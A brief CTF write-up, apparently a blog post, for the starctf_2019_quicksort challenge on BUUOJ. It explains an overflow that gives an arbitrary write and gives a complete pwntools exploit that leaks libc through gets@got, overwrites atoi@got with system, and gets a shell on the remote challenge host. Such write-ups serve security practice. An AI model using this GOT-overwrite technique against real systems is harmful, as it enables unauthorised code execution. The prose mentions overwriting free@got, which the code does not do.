BUU-starctf_2019_quicksort-WP

Posted on Jan 29, 2021

Without noticing it I had wasted a whole day in Factorio, so I did this challenge, which cannot really be called hard.

Here the input into s can overflow into ptr, giving an arbitrary-address write. Note that gets reads until it sees '\n'; a '\x00' byte does not stop it from reading.

Conveniently, gets@got and free@got are adjacent, so we can overwrite free@got and, at the same time, leak the address of gets through the printf that follows.

exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = "debug")

#sh = process("./starctf_2019_quicksort")
sh = remote("node3.buuoj.cn",27373)
libc = ELF("./libcs/buu-32-libc.so")
elf = ELF('./starctf_2019_quicksort')

sh.sendlineafter("sort?\n",'2')

# first pass: point ptr at gets@got so the sorted output leaks the gets address
payload = str(0x08048816)
payload = payload.ljust(0x10,'\x00') + p32(1) + p32(1) + p32(0) + p32(elf.got["gets"])
sh.sendlineafter("number:",payload)

sh.recvuntil("result:\n")
gets_addr = int(sh.recvuntil(" \n",drop = True),base = 10)
libc_base = gets_addr - libc.symbols["gets"]
log.success("libc base:" + hex(libc_base))

system_addr = libc_base + libc.symbols["system"]
log.success("system addr:" + hex(system_addr))

sh.sendlineafter("sort?\n",'2')

# second pass: same overflow, this time targeting atoi@got
payload = str(system_addr)
payload = payload.ljust(0x10,'\x00') + p32(0) + p32(0) + p32(0) + p32(elf.got["atoi"])
sh.sendlineafter("number:",payload)

sh.sendlineafter("sort?\n",'1')
sh.sendlineafter("number:","/bin/sh\x00")

sh.interactive()
```